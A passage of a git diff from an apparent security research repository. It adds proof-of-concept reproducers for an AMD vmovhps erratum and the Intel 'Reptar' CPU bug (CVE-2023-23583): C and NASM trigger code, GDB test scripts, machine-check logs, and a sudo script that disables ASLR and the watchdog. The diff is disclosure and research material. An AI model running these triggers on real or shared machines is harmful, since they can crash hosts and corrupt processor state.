Patch=0xa10113b` + +You can verify the current Model, Family, Stepping and Patch level by +examining `/proc/cpuinfo`. + +### Reproducing + +The program `movhps.c` is the testcase. + +It should not produce any output unless an affected core detected. + +#### Building + +``` +$ gcc -mavx512vl -o movhps movhps.c +``` + +#### Running + +The normal expected output of `movhps` should be empty. + +On an affected CPU, the output might look like this: + +``` +$ ./movhps +After 1: 0000000000000000, 0000000000000000 +After 2: 0000000000000000, 0000000000000000 +After 1: 0000000000000000, 0000000000000000 +After 2: 0000000000000000, 0000000000000000 +After 1: 0000000000000000, 0000000000000000 +After 2: 0000000000000000, 0000000000000000 +``` + +This indicates that sometimes the wrong value was tested. + +### Conclusion + +It is possible for incorrect code to be generated when using compiler +intrinsics. It is not clear what values are being tested, or if it is possible +to infer any other state. + +AMD have indicated that they do not believe this is a security issue, but gave +no further explanation when asked. diff --git a/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c b/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c new file mode 100644 index 00000000..d8c3b1ca --- /dev/null +++ b/pocs/cpus/errata/amd/genoa-lps-hps/movhps.c @@ -0,0 +1,53 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define __aligned __attribute__((aligned(32))) + +#if !defined(__AVX512VL__) +# error You must compile this with -mavx512vl to get the needed intrinsics +#endif + +static const uint64_t kData[] = { 0x4444444444444444, 0x4242424242424242 }; +static const uint64_t kZero; + +static void vmovhps_testcase() +{ + uint64_t result[2] __aligned = {0}; + register __m128i r0 asm("xmm0"); + register __m128i r1 asm("xmm1"); + register __m128i r17 asm("xmm17"); + uint64_t count = 0; + + _mm256_zeroall(); + + do { + count++; + + // Trigger bug + asm volatile ("vmovdqu %1, %0" : "=v"(r0) : "m"(kData)); + asm volatile ("vmovlps %2, %1, %0" : "=v"(r1) : "v"(r0), "m"(kZero)); + asm volatile ("vmovhps %2, %1, %0" : "=v"(r17) : "v"(r0), "m"(kZero)); + } while (!_mm_testz_si128(r1, r1)); + + _mm_storeu_si128((void *) result, r1); + + fprintf(stderr, "After %llu: %016llx, %016llx\n", count, result[0], result[1]); + return; +} + +int main(int argc, char **argv) +{ + while (true) { + vmovhps_testcase(); + } + return 0; +} diff --git a/pocs/cpus/reptar/Makefile b/pocs/cpus/reptar/Makefile new file mode 100644 index 00000000..242c63aa --- /dev/null +++ b/pocs/cpus/reptar/Makefile @@ -0,0 +1,16 @@ +CFLAGS=-O0 -ggdb3 -march=icelake-server +LDFLAGS=-pthread -Wl,-z,noexecstack -static +NFLAGS= + +.PHONY: clean + +all: icebreak + +%.o: %.asm + nasm $(NFLAGS) -O0 -felf64 -o $@ $^ + +icebreak: main.o hammer.o threads.o util.o + +clean: + rm -f *.o core + rm -f icebreak diff --git a/pocs/cpus/reptar/README.md b/pocs/cpus/reptar/README.md new file mode 100644 index 00000000..e853f50b --- /dev/null +++ b/pocs/cpus/reptar/README.md @@ -0,0 +1,151 @@ +# REP MOVSB Redundant Prefixes Can Corrupt Ice Lake Microarchitectural State +

aka "Reptar", CVE-2023-23583

+

+Tavis Ormandy
+Eduardo Vela Nava
+Josh Eads
+Alexandra Sandulescu
+

+ +## Introduction + +If you've ever written any x86 assembly at all, you've probably used `rep movsb`. +It's the idiomatic way of moving memory around on x86. You set the *source*, +*destination*, *direction* and the *count* - then just let the processor handle +all the details! + +```nasm +lea rdi, [rel dst] +lea rsi, [rel src] +std +mov rcx, 32 +rep movsb +``` + +The actual instruction here is `movsb`, the `rep` is simply a prefix that +changes how the instruction works. In this case, it indicates that you want +this operation **rep**eated multiple times. + +There are lots of other prefixes too, but they don't all apply to every +instruction. + +#### Prefix Decoding + +An interesting feature of x86 is that the instruction decoding is generally +quite relaxed. If you use a prefix that doesn't make sense or conflicts with +other prefixes nothing much will happen, it will usually just be ignored. + +This fact is sometimes useful; compilers can use redundant prefixes to pad a +single instruction to a desirable alignment boundary. + +Take a look at this snippet, this is exactly the same code as above, just a +bunch of useless or redundant prefixes have been added: + +```nasm + rep lea rdi, [rel dst] + cs lea rsi, [rel src] + gs gs gs std + repnz mov rcx, 32 +rep rep rep rep movsb +``` + +Perhaps the most interesting prefixes are `rex`, `vex` and `evex`, all of which +change how subsequent instructions are decoded. + +Let's take a look at how they work. + +#### The REX prefix + +The i386 only had 8 general purpose registers, so you could specify which +register you want to use in just 3 bits (because 2^3 is 8). + +The way that instructions were encoded took advantage of this fact, and reserved +*just* enough bits to specify any of those registers. + +This is a problem, because x86-64 added 8 additional general purpose registers. +We now have sixteen possible registers..that's 2^4, so we're going +to need another bit. + +The solution to this is the `rex` prefix, which gives us some spare bits that +the next instruction can borrow. + +When we're talking about rex, we usually write it like this: + +```nasm +rex.rxb +``` + +`rex` is a single-byte prefix, the first four bits are mandatory and the +remaining four bits called `b`, `x`, `r` and `w` are all optional. If you see +`rex.rb` that means only the `r` and `b` bits are set, all the others are +unset. + +These optional bits give us room to encode more general purpose registers in +the following instruction. + +#### Encoding Rules + +So now we know that `rex` increases the available space for encoding operands, +and that useless or redundant prefixes are usually ignored on x86. So... what +should this instruction do? + +```nasm +rex.rxb rep movsb +``` + +The `movsb` instruction doesn't have any operands - they're all implicit - so +any `rex` bits are meaningless. + +If you guessed that the processor will just silently ignore the `rex` prefix, +you would be correct! + +Well... except on machines that support a new feature called *fast short +repeat move*! We discovered that a bug with redundant `rex` prefixes could +interact with this feature in an unexpected way and introduce a serious +vulnerability. + +#### Reproduce + +We're publishing all of our research today to our [security research +repository](https://github.com/google/security-research/). If you want to +reproduce the vulnerability you can use our `icebreak` tool, I've also made a +local mirror available [here](files/icebreak.tar.gz). + +``` +$ ./icebreak -h +usage: ./icebreak [OPTIONS] + -c N,M Run repro threads on core N and M. + -d N Sleep N usecs between repro attempts. + -H N Spawn a hammer thread on core N. +icebreak: you must at least specify a core pair with -c! (see -h for help) +``` + +The testcase enters what should be an infinite loop, and unaffected systems +should see no output at all. On affected systems, a `.` is printed on each +successful reproduction. + +``` +$ ./icebreak -c 0,4 +starting repro on cores 0 and 4 +......................................................................... +......................................................................... +......................................................................... +......................................................................... +......................................................................... +``` + +In general, if the cores are SMT +siblings then you may observe random branches and if they're SMP siblings from the same package +then you may observe machine checks. + +If you do *not* specify two different cores, then you might need to use a +hammer thread to trigger a reproduction. + +## Solution + +Intel have +[published](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00950.html) +updated microcode for all affected processors. Your operating system or BIOS +vendor may already have an update available! + diff --git a/pocs/cpus/reptar/config.asm b/pocs/cpus/reptar/config.asm new file mode 100644 index 00000000..e69de29b diff --git a/pocs/cpus/reptar/hammer.asm b/pocs/cpus/reptar/hammer.asm new file mode 100644 index 00000000..f9e3e171 --- /dev/null +++ b/pocs/cpus/reptar/hammer.asm @@ -0,0 +1,22 @@ +BITS 64 + +%include "syscalls.asm" +%include "macros.asm" +%include "config.asm" + +section .text + +global sibling_trigger +global sibling_fault + +sibling_trigger: + mfence + mov rax, SYS_sched_yield + syscall + jmp sibling_trigger + hlt + +sibling_fault: + .repeat: + ud2 + jmp .repeat diff --git a/pocs/cpus/reptar/icebreak.asm b/pocs/cpus/reptar/icebreak.asm new file mode 100644 index 00000000..d1b58a4a --- /dev/null +++ b/pocs/cpus/reptar/icebreak.asm @@ -0,0 +1,47 @@ +BITS 64 + +%include "syscalls.asm" +%include "macros.asm" +%include "config.asm" + +global icelake_repro +global icelake_buf + +section .data + align 4096 + dst: dq 0, 0 + src: dq 0, 0 +section .text + + ; This should be aligned on a page boundary so that we can mprotect/madvise it. + align 4096 +icelake_repro: + ; We ret on error, so save where we want to go. + ; this is just because ret is a one-byte opcode. + push .finish + xor r8, r8 ; iteration counter + mov rax, SYS32_sched_yield ; this benchmarks better than syscall + int 0x80 + xor rcx, rcx + align 32 + ; If you find an MCE difficult to repro, adjust this number for your SKU (try 0..8). + times 2 nop + .repeat: + inc r8 ; keep track of executions + inc rcx ; movsb count + lea rdi, [rel dst] + lea rsi, [rel src] + rep + rex + rex r + movsb + rep movsb + jmp short .repeat + .after: + lfence + ; This should be unreachable + times 128 ret + .finish: + mov rax, r8 + ret + hlt diff --git a/pocs/cpus/reptar/macros.asm b/pocs/cpus/reptar/macros.asm new file mode 100644 index 00000000..d6cb8f12 --- /dev/null +++ b/pocs/cpus/reptar/macros.asm @@ -0,0 +1,21 @@ + +; macro to generate rex bytes +; e.g. rex w,x,b +%macro rex 0-4 + %assign _rex 0b01000000 + %rep %0 + %ifidni %1, W + %assign _rex _rex | 0b1000 + %elifidni %1, R + %assign _rex _rex | 0b0100 + %elifidni %1, X + %assign _rex _rex | 0b0010 + %elifidni %1, B + %assign _rex _rex | 0b0001 + %else + %error unrecognized flag %1 + %endif + %rotate 1 + %endrep + db _rex +%endmacro diff --git a/pocs/cpus/reptar/main.c b/pocs/cpus/reptar/main.c new file mode 100644 index 00000000..f2d36f05 --- /dev/null +++ b/pocs/cpus/reptar/main.c @@ -0,0 +1,138 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "threads.h" +#include "util.h" + +extern uint64_t icelake_repro(); +extern uint64_t sibling_trigger(); + +static void * icelake_worker(void *param) +{ + // Need to enable cancellation. + pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL); + + icelake_repro(); + + pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, NULL); + + return 0; +} + +static void * icelake_hammer(void *param) +{ + // Need to enable cancellation. + pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL); + + sibling_trigger(); + + pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, NULL); + + return 0; +} + +static void print_help() +{ + logmsg("usage: ./icebreak [OPTIONS]"); + logmsg(" -c N,M Run repro threads on core N and M."); + logmsg(" -d N Sleep N usecs between repro attempts."); + logmsg(" -H N Spawn a hammer thread on core N."); +} + +static struct rlimit rlim = { + .rlim_cur = 0, + .rlim_max = 0, +}; + +static int delay = 1000; + +int main(int argc, char **argv) +{ + pthread_t A = 0, B = 0; + pthread_t hammer = 0; + int coreA = -1; + int coreB = -1; + int opt; + int coreH = -1; + pid_t child; + + setrlimit(RLIMIT_CORE, &rlim); + + while ((opt = getopt(argc, argv, "H:hc:d:")) != -1) { + switch (opt) { + case 'c': if (sscanf(optarg, "%u,%u", &coreA, &coreB) != 2) + errx(EXIT_FAILURE, "the format required is N,M, for example: 0,1"); + break; + case 'd': delay = atoi(optarg); + break; + case 'H': coreH = atoi(optarg); + break; + case 'h': print_help(); + break; + default: + print_help(); + errx(EXIT_FAILURE, "unrecognized commandline argument"); + } + } + + if (coreA < 0 || coreB < 0) { + errx(EXIT_FAILURE, "you must at least specify a core pair with -c! (see -h for help)"); + } + + if (coreH >= 0) { + hammer = spawn_thread_core(icelake_hammer, NULL, coreH); + logmsg("Hammer thread %p on core %d", hammer, coreH); + } + + logmsg("starting repro on cores %d and %d", coreA, coreB); + + do { + // Run this in a subprocess in case it crashes. + if ((child = fork()) == 0) { + + // Make sure it doesn't get stuck if it jumps into an infinite loop. + alarm(5); + + // Attempt to repro 64 times. + int a = 1, b = 1; + for (int i = 0; i < 64; i++) { + if (!A || (a = pthread_tryjoin_np(A, NULL)) == 0) + A = spawn_thread_core(icelake_worker, NULL, coreA); + if (!B || (b = pthread_tryjoin_np(B, NULL)) == 0) + B = spawn_thread_core(icelake_worker, NULL, coreB); + + if (a == 0 || b == 0) + fputc('.', stderr); + else + usleep(delay); + } + + // No luck, it might be in a weird state - restart. + pthread_cancel(A); + pthread_cancel(B); + + fputc('\n', stderr); + + pthread_join(A, NULL); + pthread_join(B, NULL); + + _exit(0); + } + } while (waitpid(child, NULL, 0) != -1); + + err(EXIT_FAILURE, "this is supposed to be unreachable, waitpid() failed"); + + return 0; +} diff --git a/pocs/cpus/reptar/minimized/Makefile b/pocs/cpus/reptar/minimized/Makefile new file mode 100644 index 00000000..91cea997 --- /dev/null +++ b/pocs/cpus/reptar/minimized/Makefile @@ -0,0 +1,27 @@ +elf_targets=$(shell find . -name '*.elf.asm' -type f -printf "%f\n" | sed 's/\.asm//' | xargs) +bin_targets=$(shell find . -name '*.bin.asm' -type f -printf "%f\n" | sed 's/\.asm//' | xargs) +test_targets=$(shell find . -name '*.gdb' -type f -printf "%f\n" | sed 's/\.gdb/.gdb.out/' | xargs) + +.PHONY: clean all test test_elf +all: $(elf_targets) $(bin_targets) + +clean: + rm -rf *.o *.elf *.bin + +test: $(test_targets) + +%.gdb.out: % + gdb -n -batch-silent -x $^.gdb + +%.bin.asm: third_party/*.asm + touch $@ + +%.bin: %.bin.asm + nasm -f bin $^ -o $@ + chmod +x $@ + +%.o: %.elf.asm + nasm -g -F DWARF -f elf64 $^ -o $@ + +%.elf: %.o + ld $^ -o $@ diff --git a/pocs/cpus/reptar/minimized/README.md b/pocs/cpus/reptar/minimized/README.md new file mode 100644 index 00000000..edf06de7 --- /dev/null +++ b/pocs/cpus/reptar/minimized/README.md @@ -0,0 +1,18 @@ +# Minimized Reptar Examples + +This directory provides a set of examples to reproduce and study the Reptar vulnerability. + +You can build them all simply by running `make`. Building the code requires `nasm`, `binutils` (for `ld`) and `make`. On an ubuntu system you can install these with `apt install -y nasm make binutils`. + +## Quick Summary + +- **reptar.align.elf.asm**: This is a more reliable reproducer that triggers an error on the first iteration. The `clflush` and the reptar instruction need to be on different 16 byte windows. This could be related to the instruction decoder working on 16 byte instructions at a time. +- **reptar.boot.bin.asm**: Same as align, but instead intended to be ran from a VM using KVM. `qemu-system-x86_64 --enable-kvm -fda reptar.boot.bin`. +- **reptar.xlat.elf.asm**: This is similar to `reptar.align.elf.asm` but generates tracing information on the syscalls it executes, so that when the program enters at a different register location, it is possible to observe the consequences. Pause will freeze the process, exit will pass `AL` as the exit code and yield will simply leave the latest `RIP` on `RCX`. +- **reptar.spec.elf.asm**: This is a test used to check if the bug works under speculation. Its setup similar to `reptar.align.elf.asm` but only runs a few iterations and prints the speed at which its able to access memory. During the "loop" generated by the bug, we access specific parts of memory which would also happen if the bug executed speculatively. Run the code as `./reptar.spec.elf | od -i`. If speculation worked, you would see multiple "short" (<150 cycles) accesses and if it didn't work, you will only see one. +- **reptar.loopless.elf.asm**: This is an easier to modify reproducer that will also trigger the bug somewhat reliably but also allows to modify the instructions executed before and after. Note the registers that the program uses at the top. +- **reptar.loop.elf.asm**: This is a more documented reproducer that explains what happens when the bug triggers and which instructions execute and which don't. Running the program on GDB should allow for quick debugging. +- **reptar.vdso.elf.bin.asm**: This is an experiment where we map ourselves just before the VDSO (you must disable ASLR first and adjust the addresses) and then make the "wrong RIP" point to the VDSO address of the time() function. As a result, the current time is stored in the address pointed to by RAX, which is then clflushed so it triggers a segfault to the current time. If we had corrupted the uop$ then we would instead expect a crash, so it appears that a long jump to the VDSO doesn't corrupt the uop$. To test try: `taskset -c 7 gdb ./reptar.vdso.elf.bin -ex r -ex 'python import datetime;print(datetime.datetime.utcfromtimestamp(gdb.parse_and_eval("*$rdi")))' -ex 'p $rsp' -ex q` - if the uop$ was not corrupted, you should see the current date/time. If it was, we would expect a segfault when writing to `0x42` at the poisoned address. +- **reptar.uncan.elf.bin.asm**: This is an experiment where we map ourselves at the end of the canonical address space for x86_64 (needs ASLR to be enabled) and then runs for as long as it can before it innevitably faults to see how far it can get into invalid address space. Error should be something like: `general protection fault ip:8000000019f5 error:0` with the last 4 bytes varying depending on how many iterations it did. +- **reptar.mce.elf.asm**: Trigger this with `./log_mce.sh` and adjust the cpu 15/7 so they are siblings. This code will trigger an MCE on some affected CPUs and log the details. Look at `mce.txt` for the expected MCE errors. If no MCE is visible, define `MCE_INSTRUCTION='rep movsb'` as that works instead on some CPUs. +- **reptar.mce.boot.bin.asm**: Same as mce, but instead intended to be ran from a VM using KVM. `qemu-system-x86_64 --enable-kvm -fda reptar.mce.boot.bin`. diff --git a/pocs/cpus/reptar/minimized/log_mce.sh b/pocs/cpus/reptar/minimized/log_mce.sh new file mode 100755 index 00000000..176e6763 --- /dev/null +++ b/pocs/cpus/reptar/minimized/log_mce.sh @@ -0,0 +1,28 @@ +#!/bin/bash + +set -ex + +touch reptar.log +cat reptar.log +echo > reptar.log + +sudo mount -t debugfs none /sys/kernel/debug || true +echo 1 | sudo tee /sys/kernel/debug/mce/fake_panic +echo 0 | sudo tee /proc/sys/kernel/watchdog +echo 0 | sudo tee /proc/sys/kernel/printk_ratelimit +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +echo 0 | sudo tee /sys/bus/cpu/devices/cpu15/online + +touch reptar.mce.asm +make reptar.mce.elf + +for i in {1..10}; do + echo $i | tee -a reptar.log + sudo sync + sleep 0.3s + taskset -c 7 ./reptar.mce.elf & + sleep 1s + sudo dmesg -t | grep mce: | uniq -c | tee -a reptar.log + sudo cat /sys/kernel/debug/mce/severities-coverage | grep -v $'^0\t' | tr '\n' , | tr '\t' : | tee -a reptar.log + kill -9 %1 || true +done diff --git a/pocs/cpus/reptar/minimized/mce.txt b/pocs/cpus/reptar/minimized/mce.txt new file mode 100644 index 00000000..99509294 --- /dev/null +++ b/pocs/cpus/reptar/minimized/mce.txt @@ -0,0 +1,43 @@ +mce: [Hardware Error]: Machine check events logged +mce: [Hardware Error]: CPU 7: Machine Check: 0 Bank 0: f6000000000f0150 +mce: [Hardware Error]: TSC 0 ADDR a540a56 +mce: [Hardware Error]: PROCESSOR 0:806d1 TIME 1700915672 SOCKET 0 APIC e microcode 3c + +Machine check events logged +Hardware event. This is not a software error. +CPU 7 BANK 0 +ADDR a540a56 +TIME 1700915672 Sat Nov 25 13:34:32 2023 +MCG status: +MCi status: +Error overflow +Uncorrected error +Error enabled +MCi_ADDR register valid +Processor context corrupt +MCA: Instruction CACHE Level-1 Instruction-Fetch Error +STATUS f6000000000f0150 MCGSTATUS 0 +CPUID Vendor Intel Family 6 Model 141 Step 1 +SOCKET 0 APIC e microcode 3c + +mce: [Hardware Error]: Machine check events logged +mce: [Hardware Error]: CPU 7: Machine Check: 0 Bank 3: be00000000800400 +mce: [Hardware Error]: TSC 0 ADDR 41a193 MISC 41a193 +mce: [Hardware Error]: PROCESSOR 0:806d1 TIME 1700915672 SOCKET 0 APIC e microcode 3c + +Machine check events logged +Hardware event. This is not a software error. +CPU 7 BANK 3 +MISC 41a193 ADDR 41a193 +TIME 1700915672 Sat Nov 25 13:34:32 2023 +MCG status: +MCi status: +Uncorrected error +Error enabled +MCi_MISC register valid +MCi_ADDR register valid +Processor context corrupt +MCA: Internal Timer error +STATUS be00000000800400 MCGSTATUS 0 +CPUID Vendor Intel Family 6 Model 141 Step 1 +SOCKET 0 APIC e microcode 3c \ No newline at end of file diff --git a/pocs/cpus/reptar/minimized/reptar.align.elf.asm b/pocs/cpus/reptar/minimized/reptar.align.elf.asm new file mode 100644 index 00000000..f739d039 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.align.elf.asm @@ -0,0 +1,39 @@ +BITS 64 + +global _start + +section .text + _start: + mov eax, 24 ; yield + jmp .suffix + .attack: + mov eax, 60 ; exit + xor ecx, ecx; clear ecx + lea rsi, [rsp+1] + mov rdi, rsi + .many_reptars: + %rep 1 + align 0x1000 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rbx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + mov [rsp], rbx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + %endrep + .suffix: + align 0x1000 + times 0x1000*8 rep pause + .exit: + mov dil, bl ; counter + syscall + jmp .attack diff --git a/pocs/cpus/reptar/minimized/reptar.align.elf.gdb b/pocs/cpus/reptar/minimized/reptar.align.elf.gdb new file mode 100644 index 00000000..2fe75988 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.align.elf.gdb @@ -0,0 +1,26 @@ +file reptar.align.elf + +starti + +break '_start.exit' if $rbx == 1 +commands + pipe printf "FAIL(rbx=%x,oneiter)\n", $rbx | cat + quit 1 +end + +break '_start.exit' if $rbx > 1 +commands + pipe printf "PASS(rbx=%x,nopsled)\n", $rbx | cat + quit 0 +end + +catch signal SIGSEGV +commands + pipe printf "PASS(rbx=%x,segfault)\n", $rbx | cat + quit 0 +end + +continue + +pipe printf "FAIL(rbx=%x,unexpected)\n", $rbx | cat +quit 1 diff --git a/pocs/cpus/reptar/minimized/reptar.boot.bin.asm b/pocs/cpus/reptar/minimized/reptar.boot.bin.asm new file mode 100644 index 00000000..e79b1e35 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.boot.bin.asm @@ -0,0 +1,37 @@ +%macro LONG_MODE_BOOT_PAYLOAD 0 + _start: + xor rbx, rbx + xor rdx, rdx + inc r15 + .attack: + cmp rdx, 1000000 + ja _start + xor ecx, ecx + lea rsi, [rsp+1] + mov rdi, rsi + .many_reptars: + align 64 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rbx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + ;mov [rsp], rbx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + align 64 + inc rdx + cmp rdx, rbx + je .attack + times 0x6000 nop + jmp _start +%endmacro + +%include "third_party/long_mode_boot.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb b/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb new file mode 100644 index 00000000..73f49d05 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.boot.bin.gdb @@ -0,0 +1,17 @@ +target remote | exec qemu-system-x86_64 --enable-kvm -gdb stdio -S -fda reptar.boot.bin + +hbreak *0x7E00 if $r15 > 0 && $rbx!=$rdx +commands + pipe printf "PASS(r15=%d,rbx=%d,rdx=%d)\n", $r15, $rbx, $rdx | cat + kill + quit 0 +end + +hbreak *0x7E00 if $r15 > 0 && $rbx==$rdx +commands + pipe printf "FAIL(r15=%d,rbx=%d,rdx=%d)\n", $r15, $rbx, $rdx | cat + kill + quit 1 +end + +continue diff --git a/pocs/cpus/reptar/minimized/reptar.loop.elf.asm b/pocs/cpus/reptar/minimized/reptar.loop.elf.asm new file mode 100644 index 00000000..d867c597 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.loop.elf.asm @@ -0,0 +1,59 @@ +BITS 64 + +global _start + +section .data + data: times 128 db 0 + +section .text + _start: + mov cl, 7 + mov eax, data + .loop_for_every_iteration: + mov rbx, cs + push rbx + push .loop_only_on_bug + call far [rsp] + .return_from_far_call: + align 64 + .loop_only_on_bug: + push rcx + clflush [rax] + clflush [rax+64] + mov rsi, 0 + cmp cl, 7 + cmove rsi, rax ; only make a valid move if rcx is 7 + mov rdi, data + mov cl, 1 + + align 64 + .reptar: + rep + db 0x44; rex.r + movsb + ; WHEN THE BUG TRIGGERS NOTHING BELOW HERE EXECUTES + ; the instructions at loop_only_on_bug execute instead + ; and the instruction pointer as seen by interrupts is + ; the one as if the execution continued below + .after_reptar: + rep + times 4 nop + jmp .skip_reptar_alias + + align 64 + ; this is aligned to match the rep rex.r movsb instruction + .reptar_alias: + nop;rep + nop;rex.r + nop;movsb + ; we cause a segfault on movsb above (by cmov rsi) but RIP will + ; point here instead on the segfault. + .after_reptar_alias: + times 100 int3 + + .skip_reptar_alias: + mov cl, 7 + align 32 + call .loop_for_every_iteration + .end_of_program: + nop diff --git a/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm b/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm new file mode 100644 index 00000000..a259f15b --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm @@ -0,0 +1,81 @@ +BITS 64 + +; rax ; USED (for CPUID temporarily) +; rbx ; USED (for CPUID temporarily) +; rcx ; USED (for CPUID and REP MOVSB) +; rdx ; USED (temporarily and for CPUID) +; rbp ; USED (magic 0xCC) +; rsp ; USED (for counter) +; rsi ; USED (for REP MOVSB) +; rdi ; USED (for REP MOVSB) +; r8 ; NOT USED +; r9 ; USED (data address) +; r10 ; NOT USED +; r11 ; NOT USED +; r12 ; NOT USED +; r13 ; NOT USED +; r14 ; NOT USED +; r15 ; NOT USED + +global _start + +%macro loopless_reptar 0 + align 128 + %%loop_for_every_iteration: + ; FLUSH TO MAKE INSTRUCTIONS BELOW SLOW + clflush [one] + clflush [magic] + clflush [r9] + clflush [r9+64] + clflush [r9+128] + mfence + lfence + sfence + cpuid + + add r9, [r9] + mov rdx, [r9+64] + lea rax, [r9] + div qword [one+rdx] + lea r9, [rax] + mov rsi, [r9] + cmp rbp, [magic+rsi+rdx] + cmove rsi, r9 + mov rdi, [r9+128+rdx] + lea rdi, [rsi+rdi] + mov ecx, [one+rdx] + xor ebp, ebp + + align 128 + %%reptar: + rep + db 0x44; rex.r + movsb + %%after_reptar: + rep nop + mov ebp, 0xcccccccc + nop +%endmacro + +section .data + one: dq 0x1 + magic: dq 0xcccccccc + data: times 512 db 0 + +section .text + _start: + mov r9, data + mov ebp, 0xcccccccc + xor rsp, rsp + ; make sure these dont pf + clflush [data] + clflush [one] + clflush [magic] + mov rax, 24 ; sched_yield + syscall + %rep 2 + loopless_reptar + inc rsp + %endrep + .end_of_program: + hlt diff --git a/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm b/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm new file mode 100644 index 00000000..7e2e0e65 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm @@ -0,0 +1,24 @@ +%macro LONG_MODE_BOOT_PAYLOAD 0 + xor rbx, rbx + xor ecx, ecx + lea rsi, [rsp+1] + mov rdi, rsi + times 8*64*64/4 pause + %rep 32*8 ; icache has 8 ways 64 sets + clflush [rdi-1] ; 4uops ; 4 bytes + clflush [rsi+63]; 4uops ; 4 bytes + dec rsi ; 1uop ; 3 bytes + dec rdi ; 1uop ; 3 bytes + times 2 nop ; 2uops ; 2 bytes + ; 16 byte boundary + 2 ways + inc rcx ; 1uop ; 3 bytes + rep + db 0x44; rex.r + movsb ; msrom ptr ; 3 bytes + pause + align 64 ; icache line size + %endrep + jmp $ +%endmacro + +%include "third_party/long_mode_boot.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.mce.elf.asm b/pocs/cpus/reptar/minimized/reptar.mce.elf.asm new file mode 100644 index 00000000..9c5bb6d4 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.mce.elf.asm @@ -0,0 +1,32 @@ +BITS 64 + +%define MCE_INSTRUCTION pause +; Define MCE_INSTRUCTION as an env var +%ifenv %!MCE_INSTRUCTION + %define MCE_INSTRUCTION %!MCE_INSTRUCTION +%endif + +global _start + +section .text + _start: + lea rsi, [rsp+1] + mov rdi, rsi + align 0x1000 + times 8*64*64 MCE_INSTRUCTION + .many_reptars: + %rep 64*8 ; icache has 8 ways 64 sets + clflush [rdi-1] ; 4uops ; 4 bytes + clflush [rsi+63]; 4uops ; 4 bytes + dec rsi ; 1uop ; 3 bytes + dec rdi ; 1uop ; 3 bytes + times 2 nop ; 2uops ; 2 bytes + ; 16 byte boundary + 2 ways + inc rcx ; 1uop ; 3 bytes + rep + db 0x44; rex.r + movsb ; msrom ptr ; 3 bytes + MCE_INSTRUCTION + align 64 ; icache line size + %endrep + times 8*64*64*100 MCE_INSTRUCTION diff --git a/pocs/cpus/reptar/minimized/reptar.spec.elf.asm b/pocs/cpus/reptar/minimized/reptar.spec.elf.asm new file mode 100644 index 00000000..1ad70302 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.spec.elf.asm @@ -0,0 +1,82 @@ +BITS 64 + +global _start + +%define OUTPUT_SIZE 32 +%define OBF_PRIME 7 + +section .data + crash_pad: times 0x10000 db 0 + far_away: times 0x1000 db 0 + output: times OUTPUT_SIZE * 4 db 0 + +section .text + clean_crash_pad: + %assign i 0 + %rep 0x10000 / 64 + clflush [crash_pad + i * 64] + %assign i i+1 + %endrep + ret + + check_leak: + %assign i 0 + %rep OUTPUT_SIZE + mfence + rdtsc + mov r10, rax + mov rax, [crash_pad + (64 * OBF_PRIME) * i] + mfence + rdtsc + sub rax, r10 + mov [output + 4 * i], eax + %assign i i + 1 + %endrep + ret + + print_output: + mov rax, 1 + mov rdi, 1 + mov rsi, output + mov rdx, OUTPUT_SIZE * 4 + syscall + ret + + exit: + mov rax, 60 + mov rdi, 0 + syscall + ret + + _start: + call clean_crash_pad + lea eax, [crash_pad + 3 * 64 * OBF_PRIME ] + mov ebx, 64 * OBF_PRIME + xor ecx, ecx + lea rsi, [rsp] + lea rdi, [rsp] + lea r11, [far_away] + mov [r11], r11 + clflush [r11] + align 0x1000 + .reptar: + ; 16 bytes + cmp [r11], rbx ; 3 bytes + jne .after_reptar ; 6 bytes + inc ecx ; 2 bytes + add eax, ebx ; 2 bytes + mov ebp, [eax] ; 3 bytes + ; 16 bytes + clflush [rsp+127] ; 4 bytes + mov [rsp], rax ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + align 0x1000 + times 0x1000*8 rep pause + .after_reptar: + call check_leak + call print_output + call exit diff --git a/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm b/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm new file mode 100644 index 00000000..50f2e569 --- /dev/null +++ 